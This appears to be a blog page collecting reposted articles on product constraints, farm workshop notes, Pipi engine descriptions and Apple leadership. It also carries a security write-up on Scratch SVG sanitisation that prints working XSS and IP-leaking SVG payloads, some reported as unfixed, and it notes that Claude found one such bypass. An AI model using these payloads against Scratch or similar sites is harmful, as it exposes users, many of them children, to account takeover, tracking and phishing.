3 constraints before I build anything

Mike's Notes

Note

Resources

  • https://jordanlord.co.uk/blog/3-constraints/

References

  • Reference

Repository

  • Home > Ajabbi Research > Library > Subscriptions > Amazing CTO
  • Home > Handbook > 

Last Updated

08/05/2026

3 constraints before I build anything

By: Jordan Lord
Jordan Lord: 07/04/2026

Building radically simple, open tools and worlds through constraint-driven engineering.

These are the 3 constraints that I use before I start building anything. I'm a believer in constraints as an enabler for creativity. Constraints help us collapse the search space, and figure out innovative solutions to problems.

I've been a builder for 10 years, and I've built products that went nowhere because they were either too complex or had no identity. These are the constraints that I landed on after making those mistakes.

One page or it doesn't get built

This constraint limits complexity and ambiguity.

Write a one pager for all of your ideas. Your one pager captures your north star. It's non-negotiable, precise, ambitious, and lean. Once your one pager is written, it is applied to all different types of communication. Share it as a memo for investors, contributors, team members, friends, or family. Working collaboratively on a product, there will always be contention points and conflict, it can sometimes be difficult to know what battles to pick. If it's not in the one pager, then it's either not worth fighting over, or the one pager ought to be amended to include the thing. Not only is a one pager useful for communication, it's useful for organising your own thoughts. If you can't fill one page, don't fill the gaps with fluff, it means you're not ready to build. First research, plan, prototype, then write the one pager again. Iterate. If it requires more than one page, it's too complex, don't build it.

The core tech must be separable from the product

This constraint limits you to ideas that have real leverage and originality.

Develop a core piece of technology that supports your product and is not the product itself. The core tech is a method, skill, tool, or even product that supports what you're doing today but must survive without it. It's a type of reusable IP. Why? Separating the core tech forces you to think beyond the product that you're building. Products pivot in direction all the time, while your core tech is constant and compounding. Compounding efforts have non-linear gains over longer time horizons. Linus Torvalds developed git to improve the Linux kernel development workflow. HashiCorp has HCL (HashiCorp Configuration Language). Google has Kubernetes. But you don't need big tech resources to build core tech, it could be a library that you extract from your codebase, or even a methodology that you refine and commit to. Your core tech is your long term commitment. It is independent of your product's direction. However, it must be aligned with you or your company's long term vision. If your idea doesn't enable core tech, then it isn't high enough leverage.

One defining constraint must shape the product

This constraint limits feature creep and forces identity.

Define your own constraint that is front and centre to your product. That means the user sees and interacts with it all the time. It is obvious and it is what gives your product identity. A good constraint gives your product a feel, it permeates through all parts of the user experience. Minecraft is built entirely from blocks. IKEA is flat-pack, self-assembly furniture. The constraint that you choose limits scope by reducing your decision space, enabling you to concentrate on the problems that really make the difference. If you don't choose a constraint, or choose a bad constraint, you will build a bloated product that will try to do everything. The design of your product will "fall out" of a well-designed constraint. Like in your product, your constraint must be front and centre in your one pager.

Closing Rule

When it comes to deciding what to build, if it fails any of these constraints, then I don't build it.

Everything to Gain from Thriving Southland

Mike's Notes

My notes from an all-day workshop organised for farmers, which I attended yesterday.

Resources

References

  • Reference

Repository

  • Home > Ajabbi Research > Library > Subscriptions > Thriving Southland
  • Home > Handbook > 

Last Updated

08/05/2026

Everything to Gain from Thriving Southland

By: Mike Peters
On a Sandy Beach: 07/05/2026

Mike is the inventor and architect of Pipi and the founder of Ajabbi.

I attended the all-day workshop "Everything to Gain" on 6 May 2026, held at the Ascot Park Hotel in Invercargill, New Zealand. Organised by Thriving Southland.

It was a day full of informative speakers on the global agricultural market, attended mainly by working farmers.



I learned a great deal from the objective data presented and from chatting with the farmers at our table. Hard times are ahead.

Thinking visually while listening

mentally ran the Workspaces for Agriculture, testing the model assumptions against what I learned.

I also did a brain dump by creating 12 A4 drawings and solving the problem with variables in the current Pipi Core buildout.

Lessons I learned

Shifting a working Pipi 9 from a laptop to a data centre led to several unexpected consequences.

I underestimated the impact of

  • The naming, generation, and pub/sub of variables.
  • Host environment.
    • OS
    • Java
    • CFML Engine
  • Needing to turn Pipi into 4 separate role-based editions, which then exposed some hidden problems.
  • Adding a nest structure between Pipi and the host environment.
  • The impact of all of the above when each engine can pub/sub and be both deterministic and probabilistic, with multiple copies of each engine, and many in different locations.
  • Path length constraint in Windows vs Linux.

This very hard problem can only be solved by running a simulation of all 18 engines in parallel and watching the interaction. Lots of feedback loops.

Yesterday, a lot of progress was made visually, answering these questions. The variable-naming convention used for 12 months has held up, despite some earlier false flags.

  • More work is needed on variable distribution rules (messaging) for automation.
    • Global
    • Local
    • etc

Today I did another 8 drawings. They were of the Messaging Engine (msg) routing variables between the engines in both deterministic and probabilistic modes.


I will sleep on all this for a few days to see if anything else pops out, then commit it to code.

The woes of sanitising SVGs

Mike's Notes

MIT Scratch is a really great way to learn to code visually. A great article by Thomas Weber about some things with SVG use that need fixing.

Resources

References

  • Reference

Repository

  • Home > Ajabbi Research > Library > Subscriptions > Amazing CTO
  • Home > Handbook > 

Last Updated

07/05/2026

The woes of sanitising SVGs

By: Thomas Weber
Muffin Ink: 11/04/2026

Worked on TurboWarp, Scratch Addons, forkphorus.

Scratch has a long history of SVG-related vulnerabilities. The source of these is that Scratch parses user-generated (ie. attacker-controlled) content into an <svg> element and appends it into the main document for various operations (eg. measuring SVG bounding box in a more reliable way than viewbox or width/height).

No matter how briefly the SVG remains in the main document, this is an inherently unsafe operation. Scratch's approach to making this safe has been to build increasingly complex infrastructure around parsing the SVG and the markup within to remove dangerous parts.

I think Scratch's approach to SVG sanitization is doomed. To explain, we have to take a trip through the history of SVG sanitization in Scratch to see how well it has worked so far.

2019: XSS via <script> tag

In 2019, a few months after the initial release of Scratch 3, Scratch discovered that SVGs can contain <script> tags that Scratch would cause to be executed when the SVG loads. This is known as an XSS.

In Scratch terms, an XSS allows an attacker to take actions on behalf of anyone that loads their project. For example, the attacker can post comments, delete projects, or otherwise try to take over the victim's account. In Scratch Desktop, XSS is elevated to arbitrary code execution because Scratch Desktop enables Electron's dangerous Node.js integration feature. (TurboWarp Desktop has not enabled that feature since v0.2.0 from March 2021)

Example from Scratch's test suite:

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
      alert('from the svg!')
  ]]></script>
</svg>

This was fixed by using a regular expression to remove script tags.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2020: XSS via oversights in previous fix (CVE-2020-7750)

In 2020, apple502j discovered that XSS is still possible. It turns out that the previous fix is utterly defective and can be bypassed by capitalizing <SCRIPT> because the regex is case-sensitive, among several other ways to bypass it. Even if the regex were implemented correctly, it would still not work because there are other ways to embed JavaScript in an SVG. For example, one can use an inline event handler:

<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <foreignObject x="1" y="1" width="1" height="1">
        <img
            xmlns="http://www.w3.org/1999/xhtml"
            src="data:any invalid URL"
            onerror="alert(1)"
        />
    </foreignObject>
</svg>

This was fixed by using DOMPurify to remove scripts from the SVG before scratch-svg-renderer appends it into the document.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2022: HTTP leak via <image> href

In 2022, it was discovered that using the href property on an <image> element, an attacker can create an SVG that will invoke an external request when it is loaded. It turns out that while DOMPurify removes executable code, it does not protect against HTTP leaks because "there are too many ways of doing that and our tests showed that it cannot be done reliably".

In Scratch terms, an HTTP leak means that a Scratch user can log the IP of anyone that loads their project, possibly revealing information such as location or school district. The victim would not need to click on any links; the IP log happens just by loading the project. Scratch seems to consider this a security bug, and I agree.

Example:

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="https://example.com/ping"/>
</svg>

This was fixed by adding DOMPurify hooks to remove href properties from all elements if the URL refers to a remote website.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2023: HTTP leak via CSS @import

In 2023, it was discovered that using a CSS @import statement inside of a <style> element, an attacker could create a project that invokes external requests when the project loads. Example:

<svg xmlns="http://www.w3.org/2000/svg">
  <style>
    @import url("https://example.com/ping");
  </style>
</svg>

This was fixed by integrating a CSS parser written in JavaScript to remove dangerous parts of the CSS. They would parse all stylesheets contained in SVGs, remove any @import statements, and convert the CSS back to a string if any changes were made so that the dangerous stuff is removed.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2024: XSS via Paper.js

In 2024, I discovered an XSS in Paper.js, a library Scratch uses in the costume editor. It turns out that while Scratch sanitized SVGs before working on them in scratch-svg-renderer, unsanitized SVGs were still being passed to Paper.js. This has largely the same impact as the 2020 scratch-svg-renderer XSS, but occurs when using the costume editor instead of when initially opening a project. Example:

<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" data-paper-data="any invalid JSON">
    <foreignObject x="1" y="1" width="1" height="1">
        <img
            xmlns="http://www.w3.org/1999/xhtml"
            src="data:any invalid URL"
            onerror="alert(1)"
        />
    </foreignObject>
</svg>

This was somewhat fixed on an extremely delayed timeline by extending the existing SVG sanitization code to run when loading an SVG, not just when processing it in scratch-svg-renderer. This means that Paper.js will only receive SVGs that have already been sanitized.

I say "somewhat fixed" because I'm not sure if that sanitization ever runs for server-downloaded SVGs. Scratch support told me they "have protections against this that are handled on our server side" which may make that redundant. I have never seen any evidence of such protections while developing proof-of-concepts, but maybe they are real.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2025: HTTP leak via CSS url()

In 2025, it was discovered that using url() inside of certain CSS rules, an attacker can create an SVG that will invoke an external request when it is loaded. Examples:

<svg xmlns="http://www.w3.org/2000/svg">
    <!-- inline style -->
    <rect style="background-image: url(https://example.com/ping)" />
    <!-- can also use a <style> element -->
    <style>
        .img {
            background-image: url("https://example.com/ping");
        }
    </style>
    <rect class="img" />
</svg>

This was fixed by substantially expanding the SVG sanitization code to also search for any usage of url() and remove any styles or attributes referencing external URLs.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2026: HTTP leak via several bugs in the previous code

In 2026, it was discovered that using url() inside of certain CSS rules, it is still possible for an attacker to create an SVG that will invoke an external request when it is loaded. It turns out there were at least three unique bugs that each allowed an HTTP leak:

  • Did not account for CSS allowing one to write out url(...) using escape codes
  • Did not handle a style attribute having more than one url(...) inside it, where the first one is safe but the second one is not
  • Did not handle url() defined in a CSS variable and referenced via var(--name)

Examples:

<svg xmlns="http://www.w3.org/2000/svg">
    <circle fill="\75\72\6c(https://example.com/ping)" />
    <rect style="/* url(#safe_url) */ background-image: url(https://example.com/ping)" />
    <style>
        :root {
            --example: url(https://example.com/ping);
        }
        .img {
            background-image: var(--example);
        }
    </style>
    <rect class="img" />
</svg>

This was fixed by adding a substantial amount of additional complexity around code that was already way too complex.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2026: Full page restyling via long transitions

In 2026, it was discovered that through clever use of very long transitions and forcing the browser to restyle all elements, an attacker can apply arbitrary styles to the full Scratch page that last until refresh. Most uses of this have been "fun" things, but here's a few ideas about more evil things you might be able to do:

Hiding the report button.

Making the like/favorite buttons cover the entire page, so that users are tricked into clicking them.

Display text telling the user that they need to open a website in a new tab to "verify" their account (some phishing page). Users are likely to trust the instructions because the message is coming from the real scratch.mit.edu.

Example project (not mine): https://scratch.mit.edu/projects/1299571218/

This will probably get fixed at some point, but today what you'll see is this:

Scratch project page, but all the page background colors are very obviously wrong.

This project uses two SVGs. The first one is the "trigger":

<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <rect x="0" y="0" width="200" height="100" fill="#111"></rect>
  <text x="100" y="55" fill="#0f0" font-size="12" text-anchor="middle">
    Trigger
  </text>
  <style>
    /* Force browser to recalc styles to activate first SVG */
    *, * *, * * *, * * * * {
      transform: translateX(1px) scale(10000) rotateY(45deg) perspective(1cm) !important;
      transition: all 9999s ease !important;
      filter: blur(0px) !important;
    }
  </style>
</svg>

The second one contains the styles to display:

<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <rect x="0" y="0" width="200" height="100" fill="#111"></rect>
  <text x="100" y="55" fill="#0f0" font-size="12" text-anchor="middle">
    Styles
  </text>
  <style>
    /* Global background blue */
    * {
      background-color: blue !important;
      color: white !important;
    }
    /* Project instructions/description styling */
    .project-description, .instructions-container {
      background-color: yellow !important;
      color: black !important;
      border: 10px solid red !important;
      transform: scale(1.1) !important;
    }
  </style>
</svg>

I won't pretend to fully understand what's going on here or why it works non-deterministically, but my general understanding is:

The trigger SVG applies transform and filter to every element in the document to forcibly make the browser recompute all styles right away, applying styles from the other SVG.

The trigger SVG applies a very long transition so that when the other SVG is removed, the styles will stick around for the duration of the "transition"

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

2026: HTTP leak via image-set()

I reported this one to Scratch in 2025. They didn't fix it, so whatever, I'll disclose it here. Any reasonable disclosure period lapsed 6 months ago.

Instead of using url(), an attacker can use image-set() to create an SVG that will invoke an external request when it is loaded. Examples:

<svg xmlns="http://www.w3.org/2000/svg">
    <!--
        image-set(...) can cause external resources to be requested without using url() at all.
    -->
    <style>
        .image-set-with-string-url {
            background-image: image-set("https://example.com/ping" 1x);
        }
    </style>
    <rect class="image-set-with-string-url" />
    <!--
        image-set(url(...)) works the same as image-set(...).
        This already gets blocked by the existing sanitization.
    -->
    <style>
        .image-set-with-inner-url-function {
            background-image: image-set(url(https://example.com/ping) 1x);
        }
    </style>
    <rect class="image-set-with-inner-url-function"></rect>
    <!--
        image-set() can also be used in inline style attributes.
    -->
    <rect style="background-image: image-set('https://example.com/ping' 1x)" />
</svg>

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

20XX: HTTP leak via new CSS features

I also reported this one to Scratch in 2025. This bug actually doesn't work today, but will in the future if browsers ever implement all of CSS Units Level 4 or CSS Images Level 4. Today, Ladybird is the only browser to implement either of these, but major browsers could implement them someday as well.

Instead of using url(), an attacker can use src() or image() to create an SVG that makes an external request when it loads. Examples:

<svg xmlns="http://www.w3.org/2000/svg">
    <!--
        Everything in this file relies on features that are defined in the browser specs, but not yet implemented in any browser.
        In theory, future browsers might initiate requests when they see these styles.
    -->
    <!--
        CSS Units Level 4 defines src(...) as an alternative to url(...).
        Unlike url(), src()'s URL can be any expression, not just a constant string.
        Reference: https://www.w3.org/TR/css-values-4/#example-a2ee15a6
        Not implemented by any major browser today. (Only implemented in the experimental Ladybird browser)
    -->
    <style>
        .src-constant {
            background: src('https://example.com/ping');
        }
        .src-variable {
            --url: 'https://example.com/ping';
            background: src(var(--url));
        }
    </style>
    <rect class="src-constant" />
    <rect class="src-variable" />
    <!--
        CSS Images Level 4 defines image() as an alternative to url() for images.
        Reference: https://www.w3.org/TR/css-images-4/#image-notation
        Not implemented by any major browser today.
    -->
    <style>
        .image {
            background: image('https://example.com/ping', black);
        }
    </style>
    <rect class="image" />
    <!-- Same as above examples, but using inline styles -->
    <rect style="background: src('https://example.com/ping');" />
    <rect style="--url: 'https://example.com/ping'; background: src(var(--url));" />
    <rect style="background: image('https://example.com/ping', black);" />
</svg>

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

This is unsustainable

Stacking more and more complexity into sanitization is clearly a doomed approach. We are more than 5 major revisions deep and yet there are still known holes. People are actively sharing projects on the Scratch website bypassing SVG sanitization. And the moment browsers decide to implement the latest CSS specs, even more holes will open up.

Furthermore, not all of these problems have clear solutions. For full page styling, both SVGs seem completely benign: there is no JavaScript or references to external resources. The fix would likely be to remove transition styles since the transitions would never run in Scratch anyway, but are you sure that's sufficient? Will you remember to also remove all the vendor-prefixed versions of transition? What about animation styles?

Some other possible cases that might allow more bypasses in the future:

css-tree (the library Scratch uses to parse CSS) and the real CSS parsers in browsers might not completely match. If so, css-tree might parse CSS such that everything looks fine and thus nothing gets removed, but then the browser's real parser does recognize external content.

Advanced new CSS features such @property or native nesting that css-tree versions might not be able to meaningfully parse without constant updates.

Browsers can always add new functions that can reference external content as they have already done with image-set() and the spec implies will happen for src() and image(). How will you keep up with the constant change in these specs to evaluate every new function and see if it could somehow allow referencing external content?

An alternative

TurboWarp (a Scratch fork I work on) was unaffected by the 2026 HTTP leaks and full page restyling issue. This isn't because I found all the clever ways for an SVG to do something bad; in fact I actually deleted the CSS sanitization code entirely to make packaged projects 400KB smaller.

I implemented an alternative approach of sandboxing the SVG inside of an iframe. First, we set up an iframe with a sandbox property of allow-same-origin. This will block script execution inside the iframe, but still let us interact with the contents inside.

Second, we set up the iframe with the following hardcoded HTML:

<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline' data:; font-src data:; img-src data:">
    </head>
    <body></body>
</html>

The inline Content-Security-Policy is set up to block all scripts and only allow loading safe resources from safe data URLs. We also still use DOMPurify to remove obviously evil things from the SVG. We then put the iframe into the document offscreen somewhere so that the measurement APIs Scratch needs will still work.

This approach gives us some very nice properties:

The browser uses its pre-existing code to do the hard part for us.

TurboWarp doesn't need to know about all the ways for an SVG to make a request. Your browser already knows this and will enforce it for any new APIs that get added.

Real-world CSP implementations are not perfect and have holes. However, those holes generally are weird edge cases that require the attacker to already be executing JavaScript in some way. Those vulnerabilities are also considered browser security issues so they have bug bounties attached to them.

The SVG can't affect the main document.

Consider the case of the full page restyling. Because the SVG is trapped inside of an iframe, the only thing it can restyle is the iframe. The styles in the iframe do not matter, so that's perfectly fine.

You can find our code here:

scratch-svg-renderer fork

paper.js fork

Maybe you can do some other interesting stuff with shadow DOM or other web APIs, but we found that the iframe is working fine for us.

The below sections will cover any new issues I become aware of after publication.

2026-04-12: Claude finds HTTP leak via CSS nesting relaxed syntax

After publishing this, I was curious how well current language models are at finding these bugs. I told Claude Opus 4.6 to clone the scratch-editor repo, look at the recent SVG renderer changes, and see if there were any holes. Results were interesting:

Claude discovered on its own that image-set(...) is not sanitized and can cause HTTP leaks.

Claude discovered a new issue not described in the original version of this post.

The bug involves CSS nesting, which can appear in two forms. The nested style can prefix the selector with an & or instead just not prefix it (the latter being known as "relaxed" syntax). Modern browsers interpret both of the below identically.

g {
    & rect {
        background-image: url(https://example.com/ping);
    }
}
g {
    rect {
        background-image: url(https://example.com/ping);
    }
}

css-tree is capable of parsing the &-prefixed version into a meaningful syntax tree that Scratch can sanitize. However, it turns out that css-tree does not know how to parse the relaxed version. The entire div { ... } block is parsed as a "raw text" node which Scratch's code will not sanitize. Full example SVG:

<svg xmlns="http://www.w3.org/2000/svg">
    <style>
        g { rect { background-image: url(https://example.com/ping); } }
    </style>
    <g><rect></rect></g>
</svg>

Earlier in this post, I mentioned that "css-tree and the real CSS parsers in browsers might not completely match". This is a real-world example of that kind of bug allowing CSS to bypass sanitization. Note that css-tree currently has 48 open issues and certainly many more unknown ones. I believe depending on css-tree to be a perfect parser is a hopeless path that will continue to result in more vulnerabilities. TurboWarp's SVG sandbox fixed this bug before I even knew it existed.

This is not fixed. The css-tree issue for this bug has been open since December 2023.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

Creating 18 Engine descriptions

Mike's Notes

18 working engines are currently being imported into Pipi Core, configured, and tested.

Alex has sent me a DeepSeek chat that generated descriptions of those engines and how they worked together by analysing the existing web page "20 Engines". DeepSeek also produced a Mermaid Diagram from Markdown code based on those descriptions. DeepSeek was partially correct in some descriptions.

The Mermaid diagram was wrong, but what a great tool for Pipi to self-document with CL and accurate Markdown descriptions. It will be widely used in future as a plugin.

Feedback and suggestions are very welcome as always.

Resources

References

  • Reference

Repository

  • Home > Ajabbi Research > Library >
  • Home > Handbook > 

Last Updated

07/05/2026

Creating 18 Engine descriptions

By: Mike Peters
On a Sandy Beach: 06/05/2026

Mike is the inventor and architect of Pipi and the founder of Ajabbi.

Most Pipi engines have historically been poorly described. This is an attempt to write better descriptions for the 18 engines currently being imported.  I had a go, then used Gemini to come up with better wording, then Mrs Grammarly did her bit. 😎

Much later, once the workspace UI are working, a one-page summary about each engine can be written for the pipiWiki. The Wiki Engine (wik) in the resources above has an example of such a summary.

Descriptions

Each engine has;

  • Unique Name (Unique 3-letter code)
  • S: Short description suitable for tooltips under 100 characters.
  • D: Description under 255 characters.

System Engine (sys)

  • S: System identity and lifecycle controller.
  • D: Manages the vital signs and lifecycle of Pipi’s dynamic engine ecosystem, fostering complex emergent behaviours through seamless interaction.

Nest Engine (nst)

  • S: Host and environment interface bridge.
  • D: Serves as the foundational gateway between the host OS, Java, the application server, and the internal Pipi environment.

Namespace Engine (nsp)

  • S: Global identification and addressing.
  • D: Enforces a conflict-free global naming convention, ensuring every system element is uniquely addressable across the entire platform.

Render Engine (rnd)

  • S: Static file and asset rendering.
  • D: Processes and renders static resources, including HTML, CSS, source code, and databases.

Template Engine (tem)

  • S: Reusable pattern templates.
  • D: Manages reusable structural pattern templates used by the CMS to generate database-driven pages and components.

Variables Engine (var)

  • S: Centralised variables library.
  • D: Provides a centralised repository for managing variables used across templates, system configurations, and executable logic.

Log Engine (log)

  • S: Universal logging and telemetry controller.
  • D: Aggregates and configures logging parameters across all active engines to provide system-wide transparency and diagnostics.

Data Engine (dta)

  • S: Database lifecycle and CRUD operations.
  • D: Generates SQL to command the creation, evolution, and deletion of databases and their underlying data objects with full administrative control.

Configuration Engine (cnf)

  • S: Engine blueprint and manufacturing settings.
  • D: Supplies the precise DNA and configuration parameters required for the automated fabrication of individual Pipi engines.

Versioning Engine (ver)

  • S: Semantic versioning and update tracker.
  • D: Maintains system integrity by aggregating incremental updates from all engines into a unified semantic versioning timeline.

Code Engine (cde)

  • S: Internal code generation.
  • D: Facilitates automated code generation, including class libraries and logic synthesis directly within the Pipi platform.

Conductor Engine (cnd)

  • S: Internal process regulator.
  • D: Operates as the high-level orchestrator for major internal system processes and synchronisation.

Directory Engine (dir)

  • S: CMS file system and path manager.
  • D: Manages the logical and physical file system directories generated and utilised by the CMS.

Node Engine (nde)

  • S: Hierarchical template tree architect.
  • D: Maintains the addressable tree structure of templates to define content hierarchy within the CMS.

CMS Engine (cms)

  • S: Digital content management.
  • D: Powers the end-to-end lifecycle of digital content, from initial creation and editing to final publishing.

Core Engine (cor)

  • S: Primary system driver and logic hub.
  • D: The central engine that powers fundamental system behaviours and executes the primary logic that keeps Pipi running.

Factory Engine (fac)

  • S: Automated engine fabrication.
  • D: Assembles and deploys engines based on stored configuration files and real-time updates.

Page Engine (pge)

  • S: Semantic relationship and metadata mapper.
  • D: Maps external relationships for pages, managing keywords, references, and "See Also" semantic connections.

Tim Cook is Leaving. Good.

Mike's Notes

The key takeaway of this copied article.

"make products you’d be proud to use yourself."

Resources

References

  • Reference

Repository

  • Home > Ajabbi Research > Library > Subscriptions > Amazing CTO
  • Home > Handbook > 

Last Updated

05/05/2026

Tim Cook is Leaving. Good.

By: Tony Mattke 
Router Jockey: 27/04/2026

I’m Anthony Mattke, aka Tony. I’m a network engineer, infrastructure architect, and general-purpose technology geek located amidst the endless cornfields of north central Indiana. I’m a husband and father, and I hope to have superpowers one day. Seriously.

Your AirPods just connected to the wrong device. Again.

iMessage is taking twenty minutes to sync a message between your laptop and your phone sitting six inches apart. HomeKit forgot the kitchen lightbulb exists, and will remember it again in three hours like nothing happened. System Settings, which used to be one of the cleanest preferences UIs ever shipped, now feels like a bad Electron app pretending to be macOS.

These aren’t dramatic failures. They’re worse than dramatic failures. They’re daily proof that somewhere along the way, Apple stopped caring about the texture of using its own products.

This is Apple in 2026. And this is the Apple that Tim Cook built.

Cook announced his departure last week, and most of the coverage you’ll see is going to be a victory lap. A lot of it is earned. Apple is a three-trillion-dollar company. Services revenue is at record highs. Apple Silicon is one of the great hardware bets of the last decade. He took a company already at the top of its industry and made it bigger than the GDP of most countries.

So why am I glad he’s leaving? Because somewhere in all that growth, Apple stopped making products it was proud of.

What Steve Actually Said

There’s a passage in Walter Isaacson’s biography of Steve Jobs that gets quoted less than the famous ones. Jobs talked about how great companies die, and his theory was that the rot has nothing to do with competition or markets or innovation cycles. The rot starts when the salespeople end up running the company.

He named names. He pointed at IBM under John Akers. He pointed at Microsoft under Ballmer. He even pointed at the Sculley era of his own Apple as the cautionary tale. The phrase Jobs kept circling back to was that the people running these companies eventually “have no conception of a good product versus a bad product.” They can’t tell the difference. They can run a supply chain better than anyone alive, but they couldn’t tell you whether the radius on a button looks right.

That’s not a small criticism. That’s the founder of Apple, on the record, naming the disease and warning the company against catching it.

Then, in 2011, Apple promoted its head of operations to CEO.

I’m not saying Cook was a bad pick at the time. He was the right person to keep the trains running while everyone caught their breath after losing Steve. But fifteen years later it’s worth asking the question Steve himself would have asked. What kind of products are we shipping now?

The Tenet Cook Forgot

Of all the things Steve Jobs believed about Apple, one of them stands out as the most quietly violated under Cook: make products you’d be proud to use yourself.

Not just sell. Not just ship. Use. Sit down at the Mac on a Tuesday night, put your AirPods in, fire off a Message, set up a HomeKit automation, and feel proud of every single one of those things working the way you wanted them to.

Today’s Apple doesn’t pass that test. And the failures aren’t dramatic ones. They’re the small, persistent, daily-friction kind that the founder used to personally drive teams to fix.

You know the list. The 2022 System Settings redesign managed to take a perfectly usable preferences app and ship it as something worse, then leave it that way for three OS releases and counting. Notifications have been re-architected three times in five years and still work inconsistently across iOS, iPadOS, and macOS. Mail rules have been broken since the Obama administration. The Photos library will quietly drop items, sync ghosts, and offer no diagnostics when something goes wrong. HomeKit loses devices the way a child loses socks. Spotlight returns stale results and pauses for seconds at a time on hardware that should make it instant.

Each one of these, on its own, is just a bug. Together, they’re a culture.

They survive because they don’t move metrics. They don’t reduce revenue. They don’t show up in the quarterly. But they’re exactly the kind of paper-cuts that would have annoyed Steve at 9pm on a Tuesday, and they would have been fixed by Wednesday morning.

That’s the difference. Steve used the products. Cook signs the budget.

Before Someone Says This Is Just Nostalgia

Yes, I know. Apple under Steve wasn’t perfect. MobileMe happened. Antennagate happened. The hockey-puck mouse happened. Plenty of bad calls happened. Nobody is arguing for some flawless golden age that didn’t actually exist.

The argument is about standards, not perfection. Old Apple shipped mistakes too, and it visibly hated them. The bad release, the launch-day disaster, the public mea culpa, the engineering re-org. The whole company would visibly recoil and try to do better.

Today’s Apple ships friction and treats it like background radiation. That’s not the same thing.

The Counter Argument (-ish)

Yes, Apple Silicon is incredible. Yes, the Watch saved lives. Yes, the iPhone got better cameras and better screens and better batteries. The hardware story under Cook is strong, and pretending otherwise would be silly.

But here’s the thing about hardware. You can grow it through operational discipline. You can squeeze a process node, you can negotiate a better deal with TSMC, you can lean on a thousand suppliers until they bend. That’s exactly the kind of work Cook is good at, and it’s exactly the kind of work that doesn’t require a product person at the top.

Software is different. Software lives or dies on judgment calls a thousand times a day. Should this preference go in this menu or that one? Should this notification fire silently or with a sound? Should this Bluetooth handoff be aggressive or conservative? Those decisions can’t be operationally optimized. They have to be made by someone who actually uses the thing and has an opinion. Cook is famously not that person.

And the rot follows that exact line. Apple’s hardware reviews are still glowing. Apple’s software reviews… are not. The number of “I’m switching to Linux” or “I’m switching back to Windows” essays from longtime Apple loyalists has gone from a trickle to something that should worry someone on Apple Park’s executive row.

The grumbling isn’t about features. It’s about the texture of using the products. Which is the thing Steve cared about most, and Cook seemingly cares about least.

The Era of *aaS

There’s a related thread here. Cook’s Apple has gradually rebuilt itself as a services company that happens to make hardware. iCloud subscriptions. Apple Music. Apple TV+. Apple Arcade. Apple Fitness+. Apple News+. Apple One. AppleCare+ tiers within tiers. The recurring monthly nudges that show up in apps that used to be one-and-done.

There’s a real argument that this was a defensive move, and it worked. The Services line is now bigger than the GDP of small nations. But there’s also a reason long-time Apple users are uneasy. The company that ran the iPod silhouette ad is now the company that nudges you to try Apple Fitness+ when you open the Watch app for an unrelated reason. The texture changed. The thing that made Apple feel different is, slowly, less different.

And here’s where it loops back to the bug list. When recurring revenue becomes the thing the company optimizes for, the tolerance for friction goes up. A slightly annoying subscription upsell is acceptable as long as the funnel still works. A weird Settings menu is acceptable as long as nobody actually leaves. That’s how product standards quietly erode. Not through one dramatic bad decision, but through a thousand tolerated ones.

Was that the right business call? Maybe. Was it the right product call? Different question. And it’s the question Steve would have asked.

Enter John Ternus

The honest read on Cook’s tenure: he was the right operations CEO for the post-Steve transition, and he stayed long enough to also become the wrong product CEO for the post-iPhone era. That’s not a damning legacy. It’s just a long career with two halves that needed different people.

So who’s getting handed the keys? John Ternus.

If you needed to pick someone inside Apple to course-correct away from the operations-CEO failure mode, Ternus is the right person on paper. He’s been SVP of Hardware Engineering for years. He came up working on the Mac, ran iPad development, and was a key player in the Apple Silicon transition. He’s the one Apple keeps putting on the keynote stage to talk about new hardware. By any honest read, he’s an engineer and a product person, not a salesperson, not an operator. That’s the pick Steve would have nodded at.

BUT…

The piece I just spent a thousand words complaining about isn’t a hardware problem. Apple’s hardware under Cook has been excellent. The thing that rotted is the software experience. The bug list. And Ternus, for all his strengths, has spent his career running hardware, not software. Whether his product instincts translate into fixing the software stack is the open question of his tenure.

The hopeful read is that an engineer-CEO will demand engineering rigor across the whole company, including from the software org that’s been getting away with shipping half-baked work for a decade. The cynical read is that hardware engineers and software engineers are different cultures, and you can lead one without knowing how to fix the other.

I’m cautiously in the hopeful camp. The fact that Apple chose a builder over another finance type or another operations type says they noticed the thing this article is about. That’s not nothing.

But the proof is going to be in the next macOS release. Does System Settings get rebuilt? Does AirPods routing finally stabilize? Does Mail get a rewrite? Do notifications get a coherent strategy across all four operating systems? If yes, this was the right pick. If we get another year of shiny new features with five new bugs and zero fixes for the old ones, then Apple just rearranged the deck chairs.

Because that’s what made Apple. The rest is supply chain.

So yes. Tim Cook is leaving. Good. And John Ternus is taking the keys at exactly the moment Apple needs to remember what it was supposed to be.

How function diversity scales, from cells to companies

Mike's Notes

Fascinating work. Something to test Pipi against using long-cycle simulations.

Resources

References

  • Scaling laws for function diversity and specialization across socioeconomic and biological complex systems. Authors: Vicky Chuqiao Yang, James Holehouse, Hyejin Youn, José Ignacio Arroyo, Sidney Redner, Geoffrey B. West, and Christopher P. Kempes. PNAS (February 12, 2025). DOI: 10.1073/pnas.2509729123

Repository

